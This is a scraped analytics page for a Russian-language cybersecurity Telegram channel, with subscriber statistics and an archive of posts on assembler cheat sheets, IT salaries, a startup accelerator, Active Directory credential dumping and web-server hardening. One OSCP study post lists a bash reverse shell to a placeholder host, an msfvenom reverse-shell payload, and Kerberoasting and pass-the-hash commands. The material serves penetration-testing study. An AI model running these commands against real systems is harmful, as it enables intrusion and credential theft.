white2hack 📚

Открыть в Telegram

Кибербез. Книги, гайды, how to, ликбез. Аналитика, тренды, карьера, эвенты. Этичный хакинг и защита своих данных 🔊 Связь t.me/w2hack?direct 💬 Чат https://t.me/+VdkEIWudTi5m3dsA 💡 Консультация https://consult.ivanpiskunov.com 🏛 Обмен -- private --

Больше

Россия52 913 Технологии и приложения10 163...

📈 Аналитический обзор Telegram-канала white2hack 📚

Канал white2hack 📚 (@w2hack) является активным участником. Сейчас сообщество объединяет 12 498 подписчиков, занимая 10 163 место в категории Технологии и приложения и 52 913 место в регионе Россия.

📊 Показатели аудитории и динамика

С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 12 498 подписчиков.

Согласно последним данным от 13 июня, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 37, а за последние 24 часа — -1, при этом общий охват остаётся высоким.

Статус верификации: Не верифицирован
Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 11.09%. В первые 24 часа после публикации контент обычно набирает N/A% реакций от общего числа подписчиков.
Охват публикаций: В среднем каждый пост получает 1 386 просмотров. В течение первых суток публикация набирает 0 просмотров.
Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 9.
Тематические интересы: Контент сосредоточен на ключевых темах, таких как attack, linux, cybersecurity, white2hack, threat.

📝 Описание и контентная политика

Автор описывает ресурс как площадку для выражения субъективного мнения:
“Кибербез. Книги, гайды, how to, ликбез. Аналитика, тренды, карьера, эвенты. Этичный хакинг и защита своих данных 🔊 Связь t.me/w2hack?direct 💬 Чат https://t.me/+VdkEIWudTi5m3dsA 💡 Консультация https://consult.ivanpiskunov.com 🏛 Обмен -- private -...”

Благодаря высокой частоте обновлений (последние данные получены 14 июня, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.

12 498

Подписчики

-124 часа

+47 дней

+3730 день

1 386

Просмотры поста

Нет данных24 часа

Нет данных48 часов

11.09%

Коэффициент вовлеченности

~ 1

Постов в день

Ads index

beta

Архив постов

12 498

ASM 8086 Cheat Sheet by Mikael Peigney.pdf0.36 KB

12 498

Несколько cheat sheet по Ассемблеру x86 (Assembler)

12 498

Несколько cheat sheet по Ассемблеру x86 (Assembler) #coding

12 498

🔥 Зарплаты в Microsoft: сколько получают программисты в 2025 году 🔥 В сеть попали внутренние инструкции Microsoft по оплате труда технических специалистов, которые дают представление о реальных зарплатах и бонусах в одной из крупнейших ИТ-компаний. В Microsoft действует система уровней (грейдов), отражающая должность и опыт сотрудника. Уровни 57–59 соответствуют джуниорам, уровень 63 считается отправной точкой для сеньоров, а с 65-го начинается «принципальный» (principal) уровень. Еще выше — партнеры (68) и признанные эксперты (distinguished, 70). Например, инженер на самом высоком уровне 70 может получать до $408 000 в год (в зависимости от локации), а также получить разовую акционную премию при найме до $1,9 миллиона и ежегодные акции на сумму до $1,476 миллиона. Для новичков (уровень 57) «главный» диапазон зарплаты составляет от $83 000 до $108 000, а в городах с высоким уровнем жизни — от $95 800 до $124 600. При найме им также полагаются бонус и пакет акций. ❗️ Источник #analytics #world

12 498

💻 Дорогу талантам, новым возможностям, реальным перспективам, свежим технологиям и открытиям - МЫ ПРИГЛАШАЕМ В ИТ-АКСЕЛЕРАТОР KrokIT ➡️Кто мы такие? ➡️ KrokIT — стартап-акселератор с корнями из Беларуси, созданный бизнес-инкубатором «С нами будущее». Цель — помочь стартапам быстро добиться успеха, снизить риски и повысить привлекательность для инвесторов. 💻 Если ты в РФ, Европе и США, у тебя есть идея или MVP, ты готов делать высокотехнологичный бизнес - мы тебя ждем! ✅ С нами мы тебе гарантируем: 🔼 первая прибыль (для стартапов, пришедших на стадии идеи); 🔼 увеличение прибыли (для уже работающих стартапов); 🔼 помощь в масштабировании стартапа на зарубежные рынки (США); 🔼 формирование сильной и эффективной команды (6-месячное обучение, менторинг, нетворкинг); 🔼 продвижение продукта или услуги (СМИ, интернет пиар, Demo Day, выставки); 🔼 экспертная поддержка на протяжении всего обучения и после его окончания. ✅ Подача заявки: ➡️Подать заявку на участие можно на сайте акселератора. Программа подбирается в зависимости от стадии стартапа — идея, MVP, продажи, масштабирование. ➡️ Если стартап не получит первую прибыль или не увеличит прибыль в 2 раза, акселератор возвращает оплату: деньги или долю в проекте (согласно заключенного контракта). 📢📢 За первично консультацией по подготовке заявки (call for paper) и подробностями сотрудничества - обращайтесь в директ канала W2hack 🔝 Главная страница (FB + YT + LnkdIn) 💻 English page #info #startup #world

12 498

🔄 Результаты и отчет о третьей ежегодной церемонии награждения Pentest award 2025 🔄 Pentest award уже третий год отмечает талантливых специалистов, которые делают огромную работу по поиску уязвимостей, оставаясь за кадром. Важен сам подход и идея, необычные ресерчи и методики. Приз за победу — фирменная именная статуэтка и макбук. За второе место — айфон, а за третье — смарт-часы. ➡️ Читать на Хабре + ][akep #event

12 498

OSCP Cheat Sheet: Your Ultimate Penetration Testing Guide for Windows and Linux

12 498

OSCP Cheat Sheet: Your Ultimate Penetration Testing Guide for Windows and Linux Preparing for the OSCP exam or diving into penetration testing? Here’s a quick rundown of essential tools, commands, and techniques to help you succeed! 🔍 Recon & Enumeration Nmap: nmap -sV -p- <IP> (Full scan) SMB: crackmapexec smb <IP> -u user -p pass --shares HTTP: gobuster dir -u http://<IP> -w wordlist.txt ⚡️ Exploitation Reverse Shells: Bash: bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 MSFVenom: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe Privilege Escalation: Windows: Check winpeas.exe or powerup.ps1 Linux: sudo -l or find / -perm -u=s -type f 2>/dev/null 🔑 Password Cracking John: john --wordlist=rockyou.txt hash Hashcat: hashcat -m 1000 hash.txt wordlist.txt 🛠 Active Directory Kerberoasting: impacket-GetUserSPNs -dc-ip <DC-IP> domain/user:pass -request Pass-the-Hash: psexec.py -hashes LM:NTLM user@target 📌 Pro Tips: Always check /etc/passwd, registry keys, and scheduled tasks for privesc paths. Use tools like BloodHound for AD mapping and Mimikatz for credential dumping. #pentest

12 498

Credential Dumping LAPS

12 498

Credential Dumping LAPS In this ar�cle, we will be discussing the concept of Creden�al Dumping and LAPS (Local Administrator Password Solu�on). We will delve into the world of password management and explore how LAPS can help mi�gate the risks associated with using shared local accounts and passwords across a domain. With the increasing threat of cyber atacks, it's essen�al to understand the importance of secure password management and how LAPS can help streamline this process. Introduction to LAPS The Local Administrator Password Solu�on (LAPS) is a tool designed to manage local account passwords for computers joined to a domain. It securely stores these passwords in Ac�ve Directory (AD) and protects them using Access Control Lists (ACLs). Consequently, only authorized users can access or reset them. Key Benefits of LAPS In setups where users must log into computers without domain creden�als, managing passwords can become challenging and heighten the risk of Pass-the-Hash (PtH) atacks. Therefore, LAPS addresses the problem of using a shared local account with the same password across all computers in a domain. It assigns a unique, randomly generated password to the local administrator account on each machine. As a result, domain administrators can control which users, such as helpdesk staff, can view these passwords. #windows

12 498

Credential Dumping: DCSync Attack

12 498

Credential Dumping: DCSync Attack Active Directory Credential Dumping DCSync Attack is a specialized technique used by attackers to extract credentials from a domain controller (DC) by simulating the behavior of a domain controller itself. 🛠 Setting up a lab environment to simulate the attack 📚 Understanding the DRS protocol and how the attack works 🔍 Why such misconfigurations occur in real-world scenarios 💣 Exploiting the misconfiguration 🗺 Mapping the attack to MITRE ATT&CK 👁 Detecting the attack 🛡 Mitigation strategies 👁 Lab Setup Requirements: • A virtualized environment (e.g., VMware, VirtualBox, or Hyper-V). • Windows Server configured as a Domain Controller. • A Windows client machine. • Tools: Impacket, Mimikatz, Netexec, and Metasploit. Steps: Domain Controller Configura􀆟on: • Install and configure Windows Server as a DC where domain name is ignite.local and IP is defined as sta􀆟c 192.168.1.48. • Set up Ac􀆟ve Directory (AD) with a few users and groups. #windows

12 498

Credential Dumping

12 498

Форсируем опции безопасности для web серверов на базе Apache и nginx

12 498

Форсируем опции безопасности для web серверов на базе Apache и nginx CORS, CSP, HTTPS и HSTS - это важные компоненты безопасности веб-сайтов. Они работают вместе для защиты данных и предотвращения различных видов атак. 🚨CORS (Cross-Origin Resource Sharing): Позволяет контролировать, какие ресурсы на сервере могут быть доступны из разных доменов. Используется для безопасного обмена данными между разными доменами. По умолчанию браузеры блокируют междоменные запросы, но CORS позволяет серверам разрешать определенные запросы. 🚨CSP (Content Security Policy): Помогает предотвратить атаки, такие как межсайтовый скриптинг (XSS). Определяет, какие ресурсы (скрипты, стили, изображения и т. д.) браузеру разрешено загружать. Настраивается через заголовок HTTP Content-Security-Policy. 🚨HTTPS (Hypertext Transfer Protocol Secure): Обеспечивает безопасное соединение между браузером и сервером. Использует шифрование для защиты передаваемых данных. Необходим для защиты конфиденциальной информации, такой как пароли и данные кредитных карт. 🚨HSTS (HTTP Strict Transport Security): Указывает браузеру всегда использовать HTTPS при доступе к сайту. Предотвращает атаки, такие как downgrade (понижение) соединения до HTTP. Настраивается через заголовок HTTP Strict-Transport-Security. 💡Дополнительно: Хабр + Хабр2 + OWASP Cheat Sheet 🔽 Пример настройки опций ИБ для указанных веб северов смотри в файле ниже ⬇️⬇️⬇️ #web #hardering

12 498

🌟 Друзья, кто хочет поддержать бустами @w2hack - голосуйте по ссылке ниже! 📩 Нам не хватает всего 20 голосов (4 человека, кто может забустить) для возможности публикации сторис! Розыгрыш Telegram Premium опять может привести к наплыву ботов и фейковых аккаунтов. Ваш вклад будет очень ценен! 🥰 Boost for w2hack 🌟 #info

12 498

Сохраняя энергию стартапа. Как техногиганты ежедневно изобретают будущее и остаются на вершине, Алекс Кантровиц, 2022

12 498

Сохраняя энергию стартапа. Как техногиганты ежедневно изобретают будущее и остаются на вершине, Алекс Кантровиц, 2022 Большинство компаний, определившись со своими преимуществами, зацикливаются на их совершенствовании, но забывают при этом, что их взгляд обращен в прошлое, а не в будущее. Amazon и другие технологические гиганты (такие как Facebook, Google и Microsoft) всегда работают так, будто каждый день – первый: эти лидеры рынка тратят свое время на переосмысление своих продуктов, а не на то, чтобы бесконечно их улучшать. Благодаря 130 интервью, проведенным с сотрудниками ведущих IT-компаний, автор этой книги раскрывает секрет успеха технологических гигантов в деловом мире, где нет никаких гарантий, только риск и конкуренция. #book #startup #

12 498

Английский важен, однако уровень, планка что бы тебя понимали не столь высоки. Важнее проникнуться культурой. В каждом городе свой вайб, например, ЛА отличается от Сан Франциско. Кремневая долина уникальное место, не похожее на другие города Америки #world

12 498

👍 Друзья, за крайние пару дней (с 4/08 по 6/08) на наш канал был организован наплыв ботов и фейковых аккаунтов. Приняты меры по блокировке ботов - алгоритм очистки и бана работает автоматически и может цеплять живых пользователей, они временно попадают в blacklist. В течении нескольких дней (ориентировочно до 10/08) мы восстановим по возможности все ошибочно заблокированные аккаунты. Вы сможете переподписаться на канал без ограничений 👌 🆗 Канал работает в прежнем режиме 👍 Для новичков напоминаем, что доступ в чат (w2hack discussion) только по пригласительной ссылке (ищи в закрепе), после вступления в чат необходимо в течении 👍 30 секунд ввести ответ на капчу👍 (решить простой математический пример) иначе вас будет постоянно выкидывать. Для тех у кого все таки возникли проблемы со входом пишите в 👋бот обратной связи, обязательно указывайте свой ник, сделаем все что сможем для восстановления! #info